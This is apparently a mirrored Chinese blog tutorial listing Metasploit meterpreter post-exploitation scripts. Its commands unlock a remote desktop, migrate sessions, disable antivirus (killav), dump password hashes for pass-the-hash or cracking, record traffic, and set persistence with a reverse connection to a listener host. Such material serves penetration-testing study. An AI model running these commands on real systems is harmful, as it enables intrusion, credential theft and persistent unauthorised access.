zoukankan      html  css  js  c++  java
  • metasploit——(四)使用meterpreter脚本

        通过“run  脚本名字”命令,可以在meterpreter终端中运行扩展脚本。脚本可能会直接运行,也可能提供如何使用的帮助。

      1、run vnc

        在受控系统上运行一个交互式的远程图形化工具,你可以使用VNC协议将受控系统的桌面通信通过隧道方式映射过来,使得你访问到远程的图形化桌面。在某些情况下,受控系统可能是被锁定的,而你无法访问到桌面。。不用担心强大的metasploit能够帮助我们搞定一切: run screen_unlock 命令对目标机器上的桌面进行解锁。。。。同理,run  screen 应该就是对远程桌面进行锁定。。

      2、run  post/windows/manage/migrate

        当我们攻击系统时,常常是对诸如 IE之类的服务器进行漏洞利用,如果目标主机关闭了浏览器,meterpreter会话也将随之被关闭,从而导致与目标系统的连接丢失。。为了避免这个问题,我们可以将meterpreter会话迁移到内存空间中的其他稳定的、不会被关闭的服务进程中,以维持稳定的系统控制连接。。

      3、run  killav

        关闭杀毒软件

       4、run hashdump

        获取系统密码哈希值的副本实施哈希值传递攻击,或是进行哈希值暴力破解还原明文密码。

       5、run  packetrecorder  -i  1

       查看目标机上的所有流量 

      6、run scraper

         获取系统信息

       7、run  persistence  -X  -i  50 -p 443  -r 192.168.1.107

         确保系统重启后meterpreter还能运行。。

    ·

  • 相关阅读:
    在线课程的总结
    数据库相关整理
    两个栈实现队列&两个栈实现队列
    Django中间件的5种自定义方法
    Python Web开发之路
    内置函数——format
    Django组件拾忆
    支付宝支付流程
    消息队列之RabbitMQ
    WebSocket
  • 原文地址:https://www.cnblogs.com/hdsec/p/9522306.html
Copyright © 2011-2022 走看看